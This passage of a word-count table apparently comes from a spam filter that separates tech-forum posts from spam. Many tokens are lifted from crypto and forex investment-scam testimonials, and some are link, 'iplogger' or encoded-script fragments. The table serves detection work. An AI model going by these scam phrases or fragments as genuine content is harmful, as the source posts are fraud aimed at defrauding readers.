"tricorder": [65535, 0], "untrustable": [65535, 0], "opt": [65535, 0], "pinepod": [65535, 0], "pinebugs": [65535, 0], "unicorn": [65535, 0], "preordered": [65535, 0], "hrs": [6503, 59032], "pinecorn": [65535, 0], "pinebuds": [65535, 0], "affordable": [65535, 0], "kz": [26080, 39455], "asf": [65535, 0], "books": [65535, 0], "haiiii": [65535, 0], "ay": [65535, 0], "aten": [65535, 0], "should've": [65535, 0], "snips": [65535, 0], "sharp": [65535, 0], "hides": [65535, 0], "obtainable": [65535, 0], "obtanium": [65535, 0], "praeluceo": [65535, 0], "honesty": [11832, 53703], "eq": [65535, 0], "unexpected": [65535, 0], "cine": [65535, 0], "dainic": [65535, 0], "cqedtf": [65535, 0], "xlnwe": [65535, 0], "gitlabs": [65535, 0], "measurements": [65535, 0], "kapow": [65535, 0], "ocg": [65535, 0], "issbgatobofhcvhochochos": [65535, 0], "debootstrap": [65535, 0], "comp": [65535, 0], "threshold": [65535, 0], "celsius": [65535, 0], "crit": [65535, 0], "terribly": [65535, 0], "fbdev": [65535, 0], "fbioput": [65535, 0], "vscreeninfo": [65535, 0], "fbioputcmap": [65535, 0], "conenct": [65535, 0], "registers": [65535, 0], "accessed": [65535, 0], "fireproof": [65535, 0], "oneself": [65535, 0], "exchanging": [65535, 0], "nullr": [65535, 0], "ute": [65535, 0], "rapidly": [65535, 0], "combined": [65535, 0], "ending": [65535, 0], "woth": [65535, 0], "pineconfused": [65535, 0], "productdetail": [65535, 0], "molex": [65535, 0], "qs": [20045, 45490], "ekig": [65535, 0], "yxu": [65535, 0], "fdwll": [65535, 0], "dr": [65535, 0], "ymw": [65535, 0], "gib": [65535, 0], "codingfield": [65535, 0], "mtom": [65535, 0], "zwu": [65535, 0], "undef": [65535, 0], "appimages": [65535, 0], "altho": [65535, 0], "cx": [65535, 0], "accidentally": [65535, 0], "massively": [3421, 62114], "foundation": [65535, 0], "upsidedownfrog": [65535, 0], "absolutelyproprietary": [65535, 0], "cleansed": [65535, 0], "ressitance": [65535, 0], "psychopathic": [65535, 0], "traits": [65535, 0], "alll": [65535, 0], "crimes": [65535, 0], "recorded": [30700, 34835], "crimiers": [65535, 0], "axelmao": [65535, 0], "lewd": [65535, 0], "shleemac": [65535, 0], "refined": [65535, 0], "conflicting": [65535, 0], "wikis": [65535, 0], "offended": [65535, 0], "offloads": [65535, 0], "heisenbug": [65535, 0], "warpme": [65535, 0], "minimyth": [65535, 0], "yayyyyyyy": [65535, 0], "usbc": [65535, 0], "powerbank": [65535, 0], "fredd": [0, 65535], "withdrawal": [0, 65535], "referral": [0, 65535], "currencieshttps": [0, 65535], "tss": [0, 65535], "\u1d2c\u1d50": [0, 65535], "\u1d5b\u1d49\u02b3\u02b8": [0, 65535], "\u1d4d\u02b3\u1d43\u1d57\u1d49\u1da0\u1d58\u02e1": [0, 65535], "\u02b7\u02b0\u1d43\u1d57": [0, 65535], "\u02b7\u2071\u02e1\u02e1": [0, 65535], "\u2071": [0, 65535], "\u02b3\u1d49\u1d43\u02e1\u02e1\u02b8": [0, 65535], "\u1d48\u1d52": [0, 65535], "\u1d57\u1d52": [0, 65535], "\u1d43\u1d56\u1d56\u02b3\u1d49\u1d9c\u2071\u1d43\u1d57\u1d49": [0, 65535], "\u02b8\u1d52\u1d58": [0, 65535], "\u02e2\u2071\u02b3": [0, 65535], "\u1d47\u1d49\u1d9c\u1d43\u1d58\u02e2\u1d49": [0, 65535], "\u1d48\u1d52\u207f\u1d57": [0, 65535], "\u1d4f\u207f\u1d52\u02b7": [0, 65535], "\u02b0\u1d52\u02b7": [0, 65535], "\u1d57\u02b0\u1d43\u207f\u1d4f": [0, 65535], "\u1d49\u207f\u1d52\u1d58\u1d4d\u02b0": [0, 65535], "\u1da0\u1d52\u02b3": [0, 65535], "\u1d47\u1d49\u2071\u207f\u1d4d": [0, 65535], "\u02e2\u1d52": [0, 65535], "\u1d4f\u2071\u207f\u1d48": [0, 65535], "\u1d43\u207f\u1d48": [0, 65535], "\u1d4d\u1d52\u1d52\u1d48": [0, 65535], "\u1d50\u1d49": [0, 65535], "\u2071\u207f": [0, 65535], "\u02b8\u1d52\u1d58\u02b3": [0, 65535], "\u1d56\u02e1\u1d43\u1d57\u1da0\u1d52\u02b3\u1d50": [0, 65535], "\u2071\u1d57'\u02e2": [0, 65535], "expat": [0, 65535], "trader": [0, 65535], "tkwmmq": [0, 65535], "fortunate": [0, 65535], "representative": [0, 65535], "trading": [0, 65535], "commission": [0, 65535], "finances": [0, 65535], "lcyrrxbptynkzjvk": [0, 65535], "fxprofitable": [0, 65535], "rgordoqwrpm": [0, 65535], "\ud835\udc08\ud835\udc27": [0, 65535], "\ud835\udc2b\ud835\udc1e\ud835\udc1c\ud835\udc1e\ud835\udc27\ud835\udc2d": [0, 65535], "\ud835\udc32\ud835\udc1e\ud835\udc1a\ud835\udc2b\ud835\udc2c": [0, 65535], "\ud835\udc1b\ud835\udc22\ud835\udc2d\ud835\udc1c\ud835\udc28\ud835\udc22\ud835\udc27": [0, 65535], "\ud835\udc22\ud835\udc27\ud835\udc2f\ud835\udc1e\ud835\udc2c\ud835\udc2d\ud835\udc26\ud835\udc1e\ud835\udc27\ud835\udc2d": [0, 65535], "\ud835\udc21\ud835\udc1a\ud835\udc2f\ud835\udc1e": [0, 65535], "\ud835\udc1b\ud835\udc1e\ud835\udc1c\ud835\udc28\ud835\udc26\ud835\udc1e": [0, 65535], "\ud835\udc28\ud835\udc27\ud835\udc1e": [0, 65535], "\ud835\udc28\ud835\udc1f": [0, 65535], "\ud835\udc2d\ud835\udc21\ud835\udc1e": [0, 65535], "\ud835\udc26\ud835\udc28\ud835\udc2c\ud835\udc2d": [0, 65535], "\ud835\udc2d\ud835\udc2b\ud835\udc2e\ud835\udc2c\ud835\udc2d\ud835\udc1e\ud835\udc1d": [0, 65535], "\ud835\udc1a\ud835\udc27\ud835\udc1d": [0, 65535], "\ud835\udc2b\ud835\udc1e\ud835\udc25\ud835\udc22\ud835\udc1a\ud835\udc1b\ud835\udc25\ud835\udc1e": [0, 65535], "\ud835\udc2c\ud835\udc28\ud835\udc2e\ud835\udc2b\ud835\udc1c\ud835\udc1e\ud835\udc2c": [0, 65535], "\ud835\udc26\ud835\udc1a\ud835\udc24\ud835\udc22\ud835\udc27\ud835\udc20": [0, 65535], "\ud835\udc26\ud835\udc28\ud835\udc2b\ud835\udc1e": [0, 65535], "\ud835\udc26\ud835\udc28\ud835\udc27\ud835\udc1e\ud835\udc32": [0, 65535], "\ud835\udc12\ud835\udc28": [0, 65535], "\ud835\udc30\ud835\udc22\ud835\udc2d\ud835\udc21": [0, 65535], "\ud835\udc21\ud835\udc1a\ud835\udc29\ud835\udc29\ud835\udc32": [0, 65535], "\ud835\udc21\ud835\udc1e\ud835\udc1a\ud835\udc2b\ud835\udc2d": [0, 65535], "\ud835\udc08": [0, 65535], "\ud835\udc2c\ud835\udc1a\ud835\udc32": [0, 65535], "\ud835\udc2d\ud835\udc21\ud835\udc1a\ud835\udc27\ud835\udc24": [0, 65535], "\ud835\udc32\ud835\udc28\ud835\udc2e": [0, 65535], "\ud835\udc2d\ud835\udc28": [0, 65535], "\ud835\udc26\ud835\udc1a\ud835\udc27\ud835\udc1a\ud835\udc20\ud835\udc1e\ud835\udc26\ud835\udc1e\ud835\udc27\ud835\udc2d": [0, 65535], "\ud835\udc18\ud835\udc28\ud835\udc2e'\ud835\udc2b\ud835\udc1e": [0, 65535], "\ud835\udc03\ud835\udc1e\ud835\udc2f\ud835\udc22\ud835\udc27\ud835\udc1e": [0, 65535], "\ud835\udc07\ud835\udc1a\ud835\udc2f\ud835\udc1e": [0, 65535], "\ud835\udc02\ud835\udc1c\ud835\udc28\ud835\udc27\ud835\udc2d\ud835\udc1a\ud835\udc1c\ud835\udc2d": [0, 65535], "\ud835\udc2d\ud835\udc21\ud835\udc1e\ud835\udc26": [0, 65535], "\ud835\udc21\ud835\udc1e\ud835\udc2b\ud835\udc1e": [0, 65535], "fvmhelmh": [0, 65535], "mymq": [0, 65535], "withdrawing": [0, 65535], "coach": [0, 65535], "wdb": [0, 65535], "zdc": [0, 65535], "\ud835\ude44\ud835\ude69": [0, 65535], "\ud835\ude62\ud835\ude56\ud835\ude60\ud835\ude5a\ud835\ude68": [0, 65535], "\ud835\ude62\ud835\ude5a": [0, 65535], "\ud835\ude5d\ud835\ude56\ud835\ude65\ud835\ude65\ud835\ude6e": [0, 65535], "\ud835\ude69\ud835\ude5a\ud835\ude61\ud835\ude61\ud835\ude5e\ud835\ude63\ud835\ude5c": [0, 65535], "\ud835\ude65\ud835\ude5a\ud835\ude64\ud835\ude65\ud835\ude61\ud835\ude5a": [0, 65535], "\ud835\ude56\ud835\ude57\ud835\ude64\ud835\ude6a\ud835\ude69": [0, 65535], "\ud835\ude69\ud835\ude5d\ud835\ude5e\ud835\ude68": [0, 65535], "\ud835\ude6c\ud835\ude64\ud835\ude63\ud835\ude59\ud835\ude5a\ud835\ude67\ud835\ude5b\ud835\ude6a\ud835\ude61": [0, 65535], "\ud835\ude5e\ud835\ude63\ud835\ude6b\ud835\ude5a\ud835\ude68\ud835\ude69\ud835\ude62\ud835\ude5a\ud835\ude63\ud835\ude69": [0, 65535], "\ud835\ude58\ud835\ude64\ud835\ude62\ud835\ude65\ud835\ude56\ud835\ude63\ud835\ude6e": [0, 65535], "\ud835\ude69\ud835\ude5d\ud835\ude56\ud835\ude69": [0, 65535], "\ud835\ude5d\ud835\ude56\ud835\ude68": [0, 65535], "\ud835\ude65\ud835\ude56\ud835\ude5e\ud835\ude59": [0, 65535], "\ud835\ude62\ud835\ude56\ud835\ude63\ud835\ude6e": [0, 65535], "\ud835\ude69\ud835\ude5e\ud835\ude62\ud835\ude5a\ud835\ude68": [0, 65535], "\ud835\ude56\ud835\ude63\ud835\ude59": [0, 65535], "\ud835\ude58\ud835\ude5d\ud835\ude56\ud835\ude63\ud835\ude5c\ud835\ude5a\ud835\ude59": [0, 65535], "\ud835\ude62\ud835\ude6e": [0, 65535], "\ud835\ude61\ud835\ude5e\ud835\ude5b\ud835\ude5a": [0, 65535], "anderson": [0, 65535], "profits": [0, 65535], "agtfal": [0, 65535], "agvkmti": [0, 65535], "hubert": [0, 65535], "hivqyoriy": [0, 65535], "mmrh": [0, 65535], "invertir": [0, 65535], "criptomonedas": [0, 65535], "realista": [0, 65535], "pero": [0, 65535], "perdi\u00f3": [0, 65535], "hashbulls": [0, 65535], "reconocidohttps": [0, 65535], "cleanuri": [0, 65535], "epbdlhttps": [0, 65535], "epbdl": [0, 65535], "diannabrooks": [0, 65535], "fkbe": [0, 65535], "wvxs": [0, 65535], "szmme": [0, 65535], "confess": [0, 65535], "worthy": [0, 65535], "victor": [0, 65535], "cordeiroi": [0, 65535], "ambitions": [0, 65535], "greatful": [0, 65535], "victorcordeiroi": [0, 65535], "vvaqsn": [0, 65535], "mmgjk": [0, 65535], "nesvquez": [0, 65535], "cryptobrite": [0, 65535], "mejor": [0, 65535], "plataforma": [0, 65535], "creo": [0, 65535], "que": [0, 65535], "estado": [0, 65535], "viendo": [0, 65535], "muchos": [0, 65535], "testimonios": [0, 65535], "puedes": [0, 65535], "confirmar": [0, 65535], "todos": [0, 65535], "estos": [0, 65535], "trav\u00e9s": [0, 65535], "cryptorite": [0, 65535], "payout": [0, 65535], "mokqlspo": [0, 65535], "iyjrk": [0, 65535], "trhs": [0, 65535], "pzjhttps": [0, 65535], "pzj": [0, 65535], "unknowning": [0, 65535], "upfront": [0, 65535], "doubting": [0, 65535], "leonwilliamsfx": [0, 65535], "harrison": [0, 65535], "george": [0, 65535], "wqwntv": [0, 65535], "mwi": [0, 65535], "qb": [0, 65535], "debt": [0, 65535], "ybs": [0, 65535], "ywfk": [0, 65535], "\ud835\ude56\ud835\ude61\ud835\ude61": [0, 65535], "\ud835\ude68\ud835\ude69\ud835\ude56\ud835\ude67\ud835\ude69\ud835\ude5a\ud835\ude59": [0, 65535], "\ud835\ude6c\ud835\ude5e\ud835\ude69\ud835\ude5d": [0, 65535], "\ud835\ude56": [0, 65535], "\ud835\ude6c\ud835\ude64\ud835\ude67\ud835\ude59": [0, 65535], "\ud835\ude69\ud835\ude64": [0, 65535], "\ud835\ude69\ud835\ude67\ud835\ude6e": [0, 65535], "\ud835\ude68\ud835\ude64\ud835\ude62\ud835\ude5a\ud835\ude69\ud835\ude5d\ud835\ude5e\ud835\ude63\ud835\ude5c": [0, 65535], "\ud835\ude63\ud835\ude5a\ud835\ude6c": [0, 65535], "\ud835\ude5b\ud835\ude5e\ud835\ude67\ud835\ude68\ud835\ude69": [0, 65535], "\ud835\ude65\ud835\ude56\ud835\ude6e\ud835\ude62\ud835\ude5a\ud835\ude63\ud835\ude69": [0, 65535], "\ud835\ude58\ud835\ude64\ud835\ude62\ud835\ude5a": [0, 65535], "\ud835\ude56\ud835\ude5b\ud835\ude69\ud835\ude5a\ud835\ude67": [0, 65535], "\ud835\ude59\ud835\ude56\ud835\ude6e\ud835\ude68": [0, 65535], "\ud835\ude6c\ud835\ude5d\ud835\ude5a\ud835\ude63": [0, 65535], "\ud835\ude44": [0, 65535], "\ud835\ude5e\ud835\ude63\ud835\ude6b\ud835\ude5a\ud835\ude68\ud835\ude69\ud835\ude5a\ud835\ude59": [0, 65535], "\ud835\ude68\ud835\ude5e\ud835\ude63\ud835\ude58\ud835\ude5a": [0, 65535], "\ud835\ude69\ud835\ude5d\ud835\ude5a\ud835\ude63": [0, 65535], "smiling": [0, 65535], "beneficial": [0, 65535], "kgahtqdkmzjmjm": [0, 65535], "benefited": [0, 65535], "weeky": [0, 65535], "singax": [0, 65535], "invested": [0, 65535], "noejddbma": [0, 65535], "uxmmzk": [0, 65535], "\u026a\u1d1b": [0, 65535], "\u1d00\u029f\u029f": [0, 65535], "\ua731\u1d1b\u1d00\u0280\u1d1b\u1d07\u1d05": [0, 65535], "\u1d21\u026a\u1d1b\u029c": [0, 65535], "\u1d00": [0, 65535], "\u1d21\u1d0f\u0280\u1d05": [0, 65535], "\u1d1b\u1d0f": [0, 65535], "\u1d1b\u0280\u028f": [0, 65535], "\ua731\u1d0f\u1d0d\u1d07\u1d1b\u029c\u026a\u0274\u0262": [0, 65535], "\u0274\u1d07\u1d21": [0, 65535], "\u1d0d\u028f": [0, 65535], "\ua730\u026a\u0280\ua731\u1d1b": [0, 65535], "\u1d18\u1d00\u028f\u1d0d\u1d07\u0274\u1d1b": [0, 65535], "\u1d04\u1d0f\u1d0d\u1d07": [0, 65535], "\u1d00\ua730\u1d1b\u1d07\u0280": [0, 65535], "\u029c\u1d0f\u1d1c\u0280\ua731": [0, 65535], "\u1d21\u029c\u1d07\u0274": [0, 65535], "\u026a": [0, 65535], "\u026a\u0274\u1d20\u1d07\ua731\u1d1b\u1d07\u1d05": [0, 65535], "\u1d00\u0274\u1d05": [0, 65535], "\ua731\u026a\u0274\u1d04\u1d07": [0, 65535], "\u1d1b\u029c\u1d07\u0274": [0, 65535], "\u029c\u1d00\u1d20\u1d07": [0, 65535], "\u0280\u1d07\u1d04\u1d07\u026a\u1d20\u1d07\u1d05": [0, 65535], "\u1d04\u1d0f\u1d1c\u0274\u1d1b\u029f\u1d07\ua731\ua731": [0, 65535], "\u029c\u026a\ua731": [0, 65535], "\u1d21\u1d0f\u0280\u1d1b\u029c\u028f": [0, 65535], "kjxcudmu": [0, 65535], "wogy": [0, 65535], "crypro": [0, 65535], "analyse": [0, 65535], "tyrone": [0, 65535], "dennis": [0, 65535], "cwfmbe": [0, 65535], "verifications": [0, 65535], "stages": [0, 65535], "gainers": [0, 65535], "substantial": [0, 65535], "deposit": [0, 65535], "invention": [0, 65535], "testify": [0, 65535], "ujnnzdyetmnwm": [0, 65535], "incomes": [0, 65535], "decisions": [0, 65535], "ys": [0, 65535], "wxjyzjk": [0, 65535], "globalasset": [0, 65535], "stella": [0, 65535], "markcoin": [0, 65535], "assetwhite": [0, 65535], "markamazing": [0, 65535], "concluded": [0, 65535], "scammers": [0, 65535], "proved": [0, 65535], "asset": [0, 65535], "downpoint": [0, 65535], "rb": [0, 65535], "jsvkge": [0, 65535], "bonuswhite": [0, 65535], "withdrawalwhite": [0, 65535], "supportwhite": [0, 65535], "octagonal": [0, 65535], "signno": [0, 65535], "iplogger": [0, 65535], "bmv": [0, 65535], "gissxompvaw": [0, 65535], "izp": [0, 65535], "hdxnlciayicruawnrihwglm": [0, 65535], "zzyakbmljaybxyw": [0, 65535], "ifrviejliefuielsq": [0, 65535], "wpybucnkgvghpcybozxcgqnvnifr": [0, 65535], "cgu": [0, 65535], "azexic": [0, 65535], "vd": [0, 65535], "jpdgugjcakkybkzwnvzguoym": [0, 65535], "lnpt": [0, 65535], "sbskgjcakkybkzwnvzguoicqricrlbmnvzguojhjlywqojhnjcmlwdcxuldeplg": [0, 65535], "picqricxtksaky": [0, 65535], "hykdeynckglmxvywqglxjzicqgjcsgzgvjb": [0, 65535], "rlkgjtvjnzzz": [0, 65535], "pih": [0, 65535], "gfq": [0, 65535], "sanders": [0, 65535], "\ud835\udda7\ud835\uddbe\ud835\uddc5\ud835\uddc5\ud835\uddc8": [0, 65535], "\ud835\uddbe\ud835\uddcf\ud835\uddbe\ud835\uddcb\ud835\uddd2\ud835\uddc8\ud835\uddc7\ud835\uddbe": [0, 65535], "\ud835\udda8": [0, 65535], "\ud835\uddc3\ud835\uddce\ud835\uddcc\ud835\uddcd": [0, 65535], "\ud835\uddc6\ud835\uddba\ud835\uddbd\ud835\uddbe": [0, 65535], "\ud835\uddc6\ud835\uddd2": [0, 65535], "\ud835\uddcc\ud835\uddbe\ud835\uddbc\ud835\uddc8\ud835\uddc7\ud835\uddbd": [0, 65535], "\ud835\uddd0\ud835\uddc2\ud835\uddcd\ud835\uddc1\ud835\uddbd\ud835\uddcb\ud835\uddba\ud835\uddd0\ud835\uddba\ud835\uddc5": [0, 65535], "\ud835\uddc8\ud835\uddbf": [0, 65535], "\ud835\uddc9\ud835\uddcb\ud835\uddc8\ud835\uddbf\ud835\uddc2\ud835\uddcd": [0, 65535], "\ud835\uddd0\ud835\uddc2\ud835\uddcd\ud835\uddc1\ud835\uddc8\ud835\uddce\ud835\uddcd": [0, 65535], "\ud835\uddcc\ud835\uddcd\ud835\uddcb\ud835\uddbe\ud835\uddcc\ud835\uddcc": [0, 65535], "\ud835\uddc8\ud835\uddcb": [0, 65535], "\ud835\uddbd\ud835\uddbe\ud835\uddc5\ud835\uddba\ud835\uddd2": [0, 65535], "\ud835\uddba\ud835\uddc7\ud835\uddbd": [0, 65535], "\ud835\uddc7\ud835\uddc8": [0, 65535], "\ud835\uddbe\ud835\uddd1\ud835\uddcd\ud835\uddcb\ud835\uddba": [0, 65535], "\ud835\uddbf\ud835\uddbe\ud835\uddbe\ud835\uddcc": [0, 65535], "\ud835\uddba\ud835\uddcd\ud835\uddcd\ud835\uddba\ud835\uddbc\ud835\uddc1": [0, 65535], "\ud835\uddcd\ud835\uddc8": [0, 65535], "loa": [0, 65535], "mlm": [0, 65535], "bestforext": [0, 65535], "kylelindia": [0, 65535], "delighted": [0, 65535], "encouraged": [0, 65535], "commitments": [0, 65535], "conviction": [0, 65535], "consideration": [0, 65535], "realizing": [0, 65535], "boldly": [0, 65535], "craving": [0, 65535], "qpdekm": [0, 65535], "wished": [0, 65535], "earnings": [0, 65535], "personnels": [0, 65535], "cvn": [0, 65535], "azexicavl": [0, 65535], "dyaxrlicqgjcsgzgvjb": [0, 65535], "picqgjcsgzgvjb": [0, 65535], "rlkcakkyakzw": [0, 65535], "rlkcryzwfkkcrzy": [0, 65535], "jpchqsbiwxksxtksakkyasbskgjgnocigxmjqpic": [0, 65535], "fkic": [0, 65535], "ycyakicqrigrly": [0, 65535], "kzshibvyzwwc": [0, 65535], "psxtksb": [0, 65535], "mrs": [0, 65535], "pereira": [0, 65535], "austria": [0, 65535], "encerrar": [0, 65535], "vacunados": [0, 65535], "poblaci\u00f3n": [0, 65535], "proteger": [0, 65535], "dist\u00f3pico": [0, 65535], "orwelliano": [0, 65535], "locos": [0, 65535], "somos": [0, 65535], "nosotros": [0, 65535], "kmanalysiz": [0, 65535], "sigmundm": [0, 65535], "\ud835\udc7b\ud835\udc8a\ud835\udc8d\ud835\udc8d": [0, 65535], "\ud835\udc85\ud835\udc82\ud835\udc95\ud835\udc86": [0, 65535], "clickfoster": [0, 65535], "\ud835\udc89\ud835\udc82\ud835\udc94": [0, 65535], "\ud835\udc83\ud835\udc86\ud835\udc86\ud835\udc8f": [0, 65535], "\ud835\udc82": [0, 65535], "\ud835\udc88\ud835\udc93\ud835\udc86\ud835\udc82\ud835\udc95": [0, 65535], "\ud835\udc8a\ud835\udc8f\ud835\udc94\ud835\udc91\ud835\udc8a\ud835\udc93\ud835\udc82\ud835\udc95\ud835\udc8a\ud835\udc90\ud835\udc8f": [0, 65535], "\ud835\udc95\ud835\udc90": [0, 65535], "\ud835\udc8e\ud835\udc86": [0, 65535], "\ud835\udc82\ud835\udc8f\ud835\udc85": [0, 65535], "\ud835\udc8e\ud835\udc9a": [0, 65535], "\ud835\udc87\ud835\udc82\ud835\udc8e\ud835\udc8a\ud835\udc8d\ud835\udc9a": [0, 65535], "\ud835\udc87\ud835\udc90\ud835\udc93": [0, 65535], "\ud835\udc70": [0, 65535], "\ud835\udc85\ud835\udc86\ud835\udc91\ud835\udc90\ud835\udc94\ud835\udc8a\ud835\udc95\ud835\udc86\ud835\udc85": [0, 65535], "\ud835\udc82\ud835\udc87\ud835\udc95\ud835\udc86\ud835\udc93": [0, 65535], "\ud835\udc90\ud835\udc8f\ud835\udc86": [0, 65535], "\ud835\udc98\ud835\udc86\ud835\udc86\ud835\udc8c": [0, 65535], "\ud835\udc82\ud835\udc88\ud835\udc90": [0, 65535], "\ud835\udc8a\ud835\udc8f": [0, 65535], "\ud835\udc93\ud835\udc86\ud835\udc95\ud835\udc96": [0, 65535], "william": [0, 65535], "cutt": [0, 65535], "ztzzy": [0, 65535], "traders": [0, 65535], "broker": [0, 65535], "securities": [0, 65535], "commodities": [0, 65535], "currencies": [0, 65535], "wins": [0, 65535], "clifford": [0, 65535], "savior": [0, 65535], "'how'": [0, 65535], "albert": [0, 65535], "lzo": [0, 65535], "mxanhmmvk": [0, 65535], "llkp": [0, 65535], "wikm": [0, 65535], "zmq": [0, 65535], "samuel": [0, 65535], "pena": [0, 65535], "regret": [0, 65535], "clicking": [0, 65535], "xxzeopn": [0, 65535], "ogjk": [0, 65535], "\u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u043c": [0, 65535], "\u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u044f": [0, 65535], "\u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e": [0, 65535], "\u0434\u0440\u0443\u0433\u0438\u043c\u0438": [0, 65535], "\u0441\u043b\u043e\u0432\u0430\u043c\u0438": [0, 65535], "\u043c\u043e\u0438": [0, 65535], "\u043b\u0435\u0442": [0, 65535], "\u0432": [0, 65535], "\u0448\u043a\u043e\u043b\u0435": [0, 65535], "\u0438\u043b\u0438": [0, 65535], "\u043a\u0443\u0440\u0441\u0430": [0, 65535], "\u0443\u043d\u0438\u0432\u0435\u0440\u0435": [0, 65535], "\u0438\u0437\u0443\u0447\u0435\u043d\u0438\u044f": [0, 65535], "\u0430\u043d\u0433\u043b\u0438\u0439\u0441\u043a\u043e\u0433\u043e": [0, 65535], "\u043e\u0441\u043e\u0431\u044b\u0445": [0, 65535], "\u043f\u043b\u043e\u0434\u043e\u0432": [0, 65535], "\u043a\u0430\u043a": [0, 65535], "\u0432\u0438\u0434\u0438\u0448\u044c": [0, 65535], "\u043d\u0435": [0, 65535], "\u0434\u0430\u043b\u0438": [0, 65535], "\u0442\u043e": [0, 65535], "\u0447\u0442\u043e": [0, 65535], "\u044f": [0, 65535], "\u043c\u043e\u0433\u0443": [0, 65535], "\u0441\u043a\u0430\u0437\u0430\u0442\u044c": [0, 65535], "\u043e\u0431\u044b\u0447\u043d\u043e": [0, 65535], "\u0437\u0430\u043f\u0438\u0441\u0430\u0442\u044c": [0, 65535], "\u043f\u043e\u043c\u043d\u044e": [0, 65535], "\u043f\u0438\u0448\u0435\u0442\u0441\u044f": [0, 65535], "\u0435\u0441\u043b\u0438": [0, 65535], "\u043f\u044b\u0442\u0430\u044e\u0441\u044c": [0, 65535], "\u0441\u043b\u044b\u0448\u0438\u0442\u0441\u044f": [0, 65535], "\u0442": [0, 65535], "\u043c\u0435\u043d\u044f": [0, 65535], "\u043f\u043e\u043d\u0438\u043c\u0430\u0435\u0442": [0, 65535], "\u0443": [0, 65535], "\u0441\u0430\u043c\u043e\u0433\u043e": [0, 65535], "\u0437\u0430": [0, 65535], "\u043f\u043b\u0435\u0447\u0430\u043c\u0438": [0, 65535], "\u043c\u043d\u043e\u0433\u043e": [0, 65535], "\u043a\u0443\u0440\u0441\u043e\u0432": [0, 65535], "\u0434\u0435\u0442\u0441\u0442\u0432\u0435": [0, 65535], "\u043c\u043d\u043e\u0439": [0, 65535], "\u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0445": [0, 65535], "\u0441\u0442\u0430\u0442\u0435\u0439": [0, 65535], "\u0438": [0, 65535], "\u0431\u043b\u043e\u0433": [0, 65535], "\u043f\u043e\u0441\u0442\u043e\u0432": [0, 65535], "\u0442\u043e\u043d\u043d\u0430": [0, 65535], "\u043f\u0440\u043e\u0447\u0438\u0442\u0430\u043d\u043d\u044b\u0445": [0, 65535], "\u043c\u0430\u0442\u0435\u0440\u0438\u0430\u043b\u043e\u0432": [0, 65535], "\u043a\u0443\u0447\u0430": [0, 65535], "\u043e\u0431\u0449\u0435\u043d\u0438\u044f": [0, 65535], "\u043e\u043d\u043b\u0430\u0439\u043d": [0, 65535], "\u0431\u0435\u0437": [0, 65535], "\u043d\u0435\u0433\u043e": [0, 65535], "\u0443\u0432\u0435\u0440\u0435\u043d": [0, 65535], "\u0442\u0430\u043a": [0, 65535], "\u043b\u0435\u0433\u043a\u043e": [0, 65535], "\u0431\u044b": [0, 65535], "\u0431\u044b\u043b\u043e": [0, 65535], "\u043d\u043e": [0, 65535], "\u0430\u043d\u0433\u043b\u0438\u0439\u0441\u043a\u0438\u0439": [0, 65535], "\u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u0442": [0, 65535], "\u0434\u0432\u0435\u0440\u0435\u0439": [0, 65535], "\u044d\u0442\u043e": [0, 65535], "\u043d\u0443": [0, 65535], "\u043f\u0435\u0440\u0435\u0432\u043e\u0434\u0447\u0438\u043a": [0, 65535], "\u0434\u043b\u044f": [0, 65535], "\u0442\u0435\u0431\u044f": [0, 65535], "\u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442": [0, 65535], "\u043d\u043e\u0440\u043c\u0430\u043b\u044c\u043d\u043e": [0, 65535], "\u0442\u043e\u0436\u0435": [0, 65535], "\u043f\u0440\u0438\u0435\u043c\u043b\u0435\u043c\u043e": [0, 65535], "\u044f\u043d\u0434\u0435\u043a\u0441": [0, 65535], "\u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430": [0, 65535], "\u0441\u0442\u043e\u043b\u044c\u043a\u043e": [0, 65535], "\u043f\u0440\u0438\u043a\u043e\u043b\u044c\u043d\u044b\u0445": [0, 65535], "\u0444\u0438\u0447": [0, 65535], "\u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438": [0, 65535], "\u043f\u043e\u0442\u0440\u0435\u043d\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u0441\u044f": [0, 65535], "\u0432\u0441\u0451": [0, 65535], "\u0436\u0435": [0, 65535], "\u0443\u043f\u0443\u0441\u043a\u0430\u0439": [0, 65535], "\u043f\u043e\u043c\u043e\u0433\u0430\u0435\u0442": [0, 65535], "\u0430": [0, 65535], "\u043e\u0441\u0442\u0430\u043b\u044c\u043d\u044b\u0435": [0, 65535], "\u043f\u0438\u0448\u0443\u0442": [0, 65535], "\u0447\u0435\u0440\u0435\u0437": [0, 65535], "\u0441\u043b\u043e\u0432\u043e": [0, 65535], "\u0442\u043e\u0447\u043d\u043e": [0, 65535], "\u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0442\u044c": [0, 65535], "\u0442\u0430\u043c": [0, 65535], "\u0441\u043c\u044b\u0441\u043b": [0, 65535], "\u0432\u0430\u043c": [0, 65535], "\u0434\u043e\u0441\u0442\u0440\u043e\u0438\u0442\u0441\u044f": [0, 65535], "\u0434\u0430": [0, 65535], "\u0445\u0440\u043e\u043c\u0435": [0, 65535], "\u0430\u0432\u0442\u043e": [0, 65535], "\u043f\u0435\u0440\u0435\u0432\u043e\u0434": [0, 65535], "\u0441\u0442\u043e\u0438\u0442": [0, 65535], "\u0431\u044b\u0432\u0430\u044e\u0442": [0, 65535], "\u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b": [0, 65535], "\u0442\u043e\u043b\u044c\u043a\u043e": [0, 65535], "\u043c\u0435\u0441\u0441\u0435\u043d\u0434\u0436\u0435\u0440\u0430\u0445": [0, 65535], "\u043d\u0430\u0434\u043e": [0, 65535], "\u043a\u0443\u0434\u0430": [0, 65535], "\u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u0442\u044c": [0, 65535], "\u043f\u043e\u043d\u044f\u043b": [0, 65535], "\u043f\u0435\u0440\u0435\u0432\u043e\u0434\u0438\u0442\u044c": [0, 65535], "\u0441\u0430\u043c": [0, 65535], "\u0447\u0443\u0434\u0435\u0441\u0430": [0, 65535], 